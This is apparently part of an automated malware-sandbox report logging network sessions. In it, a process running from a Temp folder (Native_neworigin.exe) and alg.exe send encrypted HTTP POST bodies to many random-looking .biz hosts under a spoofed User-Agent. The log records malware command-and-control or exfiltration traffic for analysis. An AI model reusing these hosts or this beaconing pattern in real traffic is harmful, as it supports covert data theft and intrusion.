                                                                                                                                                                                                                                                                                                                                                    Data Ascii: *M.}nR+Wv8wR'C0X:P&{D*-t<"*?k/#<Vkw6\/\"TTngizC.m_eZvfB~k=y'`Sl[))z1iu#VStm"oaozEJM1*N<
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.419820070 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:06 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=ebadefe96bc019e88642fb3de0577791|8.46.123.75|1732605306|1732605306|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    62192.168.2.10500433.94.10.34807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.155622005 CET358OUTPOST /anxrplnvdvpxn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.155622005 CET834OUTData Raw: 6c 86 9d 58 96 3e 12 5f 36 03 00 00 d6 e4 ed a6 cd c4 55 4f 53 56 64 05 69 11 22 f6 be a5 29 42 ff ea 99 32 63 12 4a 96 5f 6c 15 ab b4 3a f6 3c 62 57 5c 2c 8b 4d 70 6f 35 81 00 fe 86 87 ce 60 9e a3 13 eb 31 b0 f7 71 a8 f7 76 1c 03 1c 59 e8 35 79
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: lX>_6UOSVdi")B2cJ_l:<bW\,Mpo5`1qvY5yveLexk34aOV3r>p>eT!=tFPd/^>JJzlU{XI6.|d!kF7ER?8#efv,DuH]IRq
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.251966000 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:06 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=18e8fa65e7649fecfd3cceb3e7755108|8.46.123.75|1732605306|1732605306|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    63192.168.2.1050044165.160.15.20807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.545288086 CET351OUTPOST /iytkitpluk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.545353889 CET834OUTData Raw: ae 57 c1 03 a9 a3 63 c7 36 03 00 00 aa e8 54 f8 4f 60 10 be 50 ec 65 77 85 7d 17 45 19 9f 96 3d 27 3b 20 c6 d2 33 41 91 6b 08 9b 2f 38 2d b7 aa 98 2b 27 76 3b b3 f3 ee c9 32 5d 97 13 df b0 39 e6 fe fa 4a 9c ba 23 bc 01 29 e2 ec 35 22 65 47 27 ff
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Wc6TO`Pew}E='; 3Ak/8-+'v;2]9J#)5"eG'E7=G>Bv]<K)(-d2Z4cK<*pn>aVN0cmvsLI44+{.DlxfseF?sene4~VOe
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.936511040 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    64192.168.2.105004518.141.10.107806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.138751984 CET347OUTPOST /cngo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.138919115 CET778OUTData Raw: d3 de b9 1d 45 47 85 ea fe 02 00 00 82 aa f9 3d 0e fd e8 de ea bd 65 8f d9 e5 b4 c7 aa 3c f0 1f 69 24 24 07 39 8b 3f 4c 6b 6f 32 3d 82 8d d3 c8 e7 96 b1 7f ab f2 2c 7f f6 04 fc 3f 7b fc 37 3c 95 da 92 84 1a 73 d8 9c cd c6 10 56 a3 cc f4 e2 f5 c0
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: EG=e<i$$9?Lko2=,?{7<sV\hh*dWr%yF24%*^?jizX!@/#a]Sb>;y;U}K6+`.Ad\a!*iU`:bM:F=XOOGn\!-s9
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.211065054 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:08 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=c2a5bce5128c88d67dbec2801d78419f|8.46.123.75|1732605308|1732605308|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    65192.168.2.1050046165.160.15.20807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.074959993 CET346OUTPOST /uwugf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.075006008 CET834OUTData Raw: 54 19 ce 96 b5 63 e3 b9 36 03 00 00 e5 e1 df 35 b8 4d 33 b1 36 e8 77 73 b4 06 6f ed e4 3d 73 35 ac e7 b0 4f 5f d8 54 95 14 59 17 dc af f8 5d 4e 6e 14 ac a2 9b 44 0a 8b d7 03 62 cb cc 7c 88 5d ca 17 e7 04 ad b2 83 d9 67 45 1b 8f ba f3 e5 e2 9e 37
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Tc65M36wso=s5O_TY]NnDb|]gE7gP>H;CG$v4/ "/).CR \"9%:?h}I"j=(+{^,c0z6(D'ApUD8e'gb(<Gz
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.332534075 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:09 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    66192.168.2.105004754.244.188.177807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.626559973 CET349OUTPOST /bvxo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.626615047 CET834OUTData Raw: b3 49 57 ab 63 8f c1 f6 36 03 00 00 df 6f 3f 1c 61 c3 17 ad f2 03 b2 d0 8e 67 dc 78 cc cf 8d 37 2a 03 d2 40 c9 f8 4d 12 06 d1 85 12 6b db 71 fa 00 38 c7 77 e1 ea 3f 28 9c 15 d1 67 f3 35 fc 30 4b 52 eb c0 49 cf c7 ae f8 2f d8 9a 55 8c 6e 9c 7c 2f
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: IWc6o?agx7*@Mkq8w?(g50KRI/Un|/AJTKYgAP0qv9dtR?aTd/BT9Q[[6HcTo$-EUW])7[4#)ykD:Fj8$uw-{
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.028804064 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:10 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=9129f0afd86c392e67e0ab9c0f55731d|8.46.123.75|1732605310|1732605310|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    67192.168.2.105004818.208.156.248806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:10.136670113 CET349OUTPOST /torfbleb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:10.136713982 CET778OUTData Raw: 2f 62 56 fc f7 f3 28 38 fe 02 00 00 8b d2 cd 1a 10 69 a0 c6 30 eb 05 83 d5 07 02 08 3d 00 51 0d 0e f0 40 54 ab ba e6 cc 95 35 8c 14 93 47 00 09 05 df a1 0d d0 8f 79 15 c3 2b ed e9 ff 29 93 2d ed 49 e9 85 e0 8d 9b 22 2f a8 2c 11 68 60 b3 3c 3e 6a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /bV(8i0=Q@T5Gy+)-I"/,h`<>j(;O!SUR]oD&Bf0R1x!kp5`FjE;B_"lvp_iZ$?.I>{xJ9&BtiT/b,\&WO Y]U;j|_]J 0ko
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.251173973 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:11 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=c323fd5672dc96fc88ffe94a702589a6|8.46.123.75|1732605311|1732605311|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    68192.168.2.1050049208.100.26.245807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.354568958 CET356OUTPOST /iqacwcupavovv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.354594946 CET834OUTData Raw: 8c 4e 03 23 76 13 6c 04 36 03 00 00 79 40 d2 ef 15 2c 40 c1 81 bb 5e 61 48 8b 20 7a b8 75 2a b5 86 9b 92 72 6a 11 09 3c 71 a6 49 80 d1 2f 7b ce 82 5a 21 cb c8 ed 78 44 e5 81 d1 c5 4f d1 86 db b8 de 88 07 27 2e 0e 22 a8 ef 7a b6 d3 4d df 3a 28 06
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: N#vl6y@,@^aH zu*rj<qI/{Z!xDO'."zM:(#bKuvbhha,@$u'~XX"Rl#E?{.`w0w`}L7&.jdM%'{-K]eF".Y[885>>\B0>x!p/dQ
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.525130987 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:12 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    69192.168.2.105005044.221.84.105806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.939577103 CET356OUTPOST /gknotpflubkt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.939608097 CET778OUTData Raw: cb 21 0d f4 e8 fc 22 00 fe 02 00 00 b4 ae a0 1a 32 cf 9c 0b 4e 87 7d 83 e8 0c 24 12 ec 9d be 98 4a 02 31 bd c5 9c 64 67 e5 ab b5 f7 3f 46 87 81 73 70 8c 0f 1f c9 b6 df 02 df d9 14 56 2e c0 27 ad df 3c 76 ff 9e 3d f6 c1 9c b7 27 39 90 d2 14 95 0f
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !"2N}$J1dg?FspV.'<v='9mXW?x%dyqSINA5 ,fKIiu5JDO4\eBzA(Z<h}{C/(bUI#wluUta(';p1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.086143017 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:12 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=601ae2e46398fa031c906ff13183f80c|8.46.123.75|1732605312|1732605312|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    70192.168.2.1050051208.100.26.245807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.729901075 CET346OUTPOST /njk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.729923010 CET834OUTData Raw: 92 13 f2 62 56 61 78 bc 36 03 00 00 6b a4 1f 63 4b e0 0a 4e 73 12 4c ca 4d a7 3e af d2 6a e8 56 31 e5 8b 79 34 2e 8e 31 ab ff 88 55 1e ee 10 55 da a6 ba 30 8e a5 be 76 e7 a1 6c a6 63 65 f3 7c 1e 06 8e 87 55 9f 3d 3c 09 93 1c 0e a2 59 8d a6 37 0c
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: bVax6kcKNsLM>jV1y4.1UU0vlce|U=<Y7x5fCS*GpALW.ZqtrS[L~ocgX,'d-CKR>7'ioFOSLFtQPNu?o':}ioN
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.907181978 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:13 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
